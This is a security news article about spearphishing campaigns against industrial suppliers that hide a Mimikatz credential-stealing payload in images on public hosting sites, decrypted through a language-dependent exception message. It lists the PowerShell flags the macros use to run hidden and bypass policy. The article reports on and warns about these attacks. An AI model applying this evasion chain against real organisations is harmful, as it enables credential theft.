Recently, researchers revealed that hackers are targeting Industrial organizations using Steganographic techniques. Read on to know more…
Recently, researchers revealed that hackers are targeting Industrial organizations using Steganographic techniques. With an aim to steal employee credentials, hackers are aiming at organizations in the Industrial sector and targeting them in sophisticated attacks.
According to Kaspersky’s ICS CERT team, hackers targeted Industrial suppliers in Japan, Italy, the UK, and Germany in highly-targeted attacks. Through these attacks, cybercriminals delivered spearphishing emails containing Microsoft Office documents with malicious macro codes to execute PowerShell scripts. This technique is called steganography, which the attackers used to dodge detection and control tools that would circumvent malicious downloads.
By creating messages and documents in specific languages, the attackers discovered the geographical locations of the targets. The purpose of the initial PowerShell script is to download an image from randomly chosen addresses on Imgur or Imgbox hosting services and extract the payload.
The concealed payload in the image is encoded using Base64, encrypted with RSA, and again encoded with Base64. An intentional error in the script creates an exception message, which is the decryption key. The exception message depends on the language used by the target’s operating system. The data hidden in the images decrypts to another PowerShell script that reveals a type of Mimikatz open-source application for obtaining access credentials on Windows.
For the exploit to trigger, the language in the email must match the localization of the target’s operating system. For instance, in the case of an attack on a Japanese company, the text of the email and an attached Microsoft Office document containing a malicious macro had to be written in Japanese. Also required was an encrypted malware module could be decrypted only when the OS had a Japanese localization as well.
Recipients who click on a request to urgently enable the document’s active content will see no indication anything is amiss. Behind the scenes, however, a macro executes a Powershell script. It hides with the command parameters
• ExecutionPolicy ByPass — to override organization policies,
• WindowStyle Hidden. This hides the PowerShell window,
• NoProfile, which executes the script with no end-user configuration.
In August 2019, Trend Micro observed a LokiBot variant using steganography when it alerted a Southeast Asian company about a possible threat. The company received an email enclosing an attachment allegedly from an Indian confectionery company.
The UK-based security firm, Sophos, discovered a botnet, dubbed MyKingz, that used steganography techniques to conceal a malicious .exe file inside an image of pop singer Taylor Swift in 2019. A security researcher from Bromium discovered ransomware embedded in a downloadable Super Mario image in 2019…Using steganography, the hackers sent emails enclosed with spreadsheets that had malware and a macro embedded in it.
By employing steganography and public image hosting services, threat actors can easily bypass network security solutions and let their payload go undetected. The custom exception message evades an automatic analysis of the malware. Avoiding steganographic attacks begins with blocking initial access. Shielding against attack vectors by training employees to detect suspicious messages is an essential step toward an improved security approach.